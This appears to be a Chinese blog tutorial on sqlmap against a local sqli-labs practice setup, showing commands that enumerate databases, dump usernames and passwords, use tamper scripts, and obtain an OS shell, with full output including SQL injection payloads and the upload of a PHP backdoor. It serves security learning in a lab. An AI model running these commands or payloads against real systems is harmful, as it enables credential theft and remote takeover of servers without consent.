zoukankan      html  css  js  c++  java
  • SQLmap的基本使用方法

    其他注入工具
    明小子
    穿山甲
    啊D
     
     
     
    确定注入点后测试
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1
     
    当前数据库
    sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --current-db
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db
     
    其他数据库
    --dbs
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs
     
    数据库内表
    -D security --tables
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables
     
    表内字段
    -D security -T users --columns
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns
     
    -D security -T users -C username,password --dump
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
     
    注入木马
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell
     
    C:/phpstudy_pro/WWW
     
    sqlmap.py -u http://localhost/sqli/Less-7/?id=1 --os-shell
     
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --os-shell
    ___
    __H__
    ___ ___["]_____ ___ ___ {1.4.7#stable}
    |_ -| . [,] | .'| . |
    |___|_ [)]_|_|_|__,| _|
    |_|V... |_| http://sqlmap.org
     
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
     
    [*] starting @ 22:51:21 /2020-12-28/
     
    [22:51:21] [INFO] resuming back-end DBMS 'mysql'
    [22:51:21] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4954=4954 AND 'HBhg'='HBhg
     
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a717a71,(SELECT (ELT(1554=1554,1))),0x716b6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HyHQ'='HyHQ
     
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5466 FROM (SELECT(SLEEP(5)))fXNK) AND 'oDCa'='oDCa
     
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8233' UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x4666737259654f717656494b4e664d47434c55644a4e764d766d6a6c5a6f74726e71584f6c686358,0x716b6b6a71),NULL-- -
    ---
    [22:51:22] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.5
    [22:51:22] [INFO] going to use a web backdoor for command prompt
    [22:51:22] [INFO] fingerprinting the back-end DBMS operating system
    [22:51:23] [INFO] the back-end DBMS operating system is Windows
    which web application language does the web server support?
    [1] ASP (default)
    [2] ASPX
    [3] JSP
    [4] PHP
    > 4
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
    [22:51:28] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 2
    please provide a comma separate list of absolute directory paths: C:phpstudy_proWWW
    [22:51:40] [WARNING] unable to automatically parse any web server path
    [22:51:40] [INFO] trying to upload the file stager on 'C:/phpstudy_pro/WWW/' via LIMIT 'LINES TERMINATED BY' method
    [22:51:41] [INFO] the file stager has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpucxne.php
    [22:51:41] [INFO] the backdoor has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpbuonw.php
    [22:51:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>
    os-shell> ipconfig
    do you want to retrieve the command standard output? [Y/n/a]
    command standard output:
    ---
     
    Windows IP 配置
     
     
    以太网适配器 本地连接:
     
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    本地链接 IPv6 地址. . . . . . . . : fe80::e488:cc63:a814:b8ab
    IPv4 地址 . . . . . . . . . . . . : 192.168.2.12
    子网掩码 . . . . . . . . . . . . : 255.255.255.0
    默认网关. . . . . . . . . . . . . : 192.168.2.2
     
    隧道适配器 isatap.localdomain:
     
    媒体状态 . . . . . . . . . . . . : 媒体已断开
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    ---
     
     
    宽字节注入
    使用unmagicquotes方法进行宽字节绕过
    sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
     
    其他绕过脚本都存放在sqlmap的/tamper/目录下
    例如kali:/usr/share/sqlmap/tamper/
     
    脚本具体用途自行百度
    https://www.cnblogs.com/mark0/p/12349551.html
     
     
    抓取POST包,标记注入
    1.burp抓取POST包导出
    2.mysql -r [文件路径/文件名]
    3.后续参数一样

    如内容有误,欢迎评论区提出建议与意见。
  • 相关阅读:
    GUI搞定
    “你说,会有来世吗?”少女露出悲伤的笑容,低声说道,“不管过了多少年,我都会一直在这里等你。如果可以的话,下辈子再和你一起,一起写GUI吧。”
    每个负责写GUI的女孩上辈子都是折翼天使
    更新了XmlParser类
    COCOS2D-X学习笔记(一)-----Node类的学习
    SwipeRefreshLayout的简要说明及使用demo
    Android的图片压缩并上传
    ActionBarSherlock的学习笔记(四) ------------ ActionBarSherlock中的搜索及SearchView的使用
    ActionBarSherlock的学习笔记(三) ------------ ActionBarSherlock中的overflow及item的点击事件
    ActionBarSherlock的学习笔记(二) ------------ 创建ActionBarSherlock
  • 原文地址:https://www.cnblogs.com/Tzsblog/p/14234441.html
Copyright © 2011-2022 走看看